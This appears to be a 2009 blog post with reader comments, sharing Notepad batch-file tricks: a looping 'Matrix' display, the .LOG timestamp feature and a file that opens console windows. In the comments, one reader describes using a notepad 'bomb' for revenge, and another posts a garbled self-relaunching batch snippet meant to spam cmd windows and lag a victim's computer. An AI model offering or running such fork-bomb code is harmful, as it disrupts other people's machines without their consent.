Fun Tricks With Notepad
November 8, 2009 by Ivan
Filed under Articles, Windows Tips, windows
Wanna learn notepad tricks?Here are 3 fun notepad tricks you can play with.. .Try them … Just for fun and experimentation.
1)How To Make Matrix With NotePad
I’am going to show you how to make cool Matrix batch file using notepad.
Open notepad and type in
@echo off
color 2
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Save it as matrix.bat

Double click on file and it will open the matrix

2)Log trick
This is simple, open notepad and type .LOG

Save it as .LOG.txt

Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

3)Open console box
Open Notepad and type starts like seen in picture below, but you can make as many as you would like.

Save it as start.bat . Depending on how many times you wrote start console boxes open.

Best of PC Hacks
- Best Free Antivirus Software
- Free Hacking Tools
- 42 Sites Where To Submit Your Tutorials
- Free Logo Generator
- How To Become The SYSTEM User In Windows XP
- Free Blackberry Software





cody5405 on Fri, 13th Nov 2009 7:25 am
i like this its pritty cool it use to be hard to get ppl back a lttle revenge threw the pc but now i just send a sart pad e bomb
Rajat on Sun, 15th Nov 2009 8:32 am
plz tell some more trickes
Dnize on Wed, 9th Dec 2009 3:16 pm
Its really a good start.. Need more of different tricks.
mitch on Wed, 30th Dec 2009 6:12 am
thats great
some_random_guest on Tue, 9th Feb 2010 6:00 pm
start
%0
begin :s
save the file as .bat
this will endlessly spam cmd untill the file is deleted or computer is turned off it might lag the computer a lot so its not likely that hes able to delete it
Vishesh Jain on Mon, 22nd Mar 2010 8:13 am
I want to know that how can i add a chat box in my site or how can i make my website more beautiful with cool fonts.
Kealani on Thu, 1st Apr 2010 9:49 pm
Those tricks are cool. I wonder how people learn to make those.
raks on Sun, 4th Apr 2010 5:40 am
cool..thanks
seedrom193 on Thu, 8th Apr 2010 9:58 am
really cool>>>>>>>i wonder if you can give me more.
nok on Tue, 20th Apr 2010 10:10 am
thanks
Rahul on Wed, 5th May 2010 4:24 am
Its Works keep up work bro………..
bloo on Sat, 8th May 2010 11:18 pm
i like that matrix one i also like the log its like im a computer wiz
rocon5 on Wed, 2nd Jun 2010 11:19 pm
u can also change the color of the matrix trick by putting in different color numbers. example:color 3
jimmy on Tue, 10th Aug 2010 1:16 am
I am looking for a batch file codes to retrieve corrupted files in USB…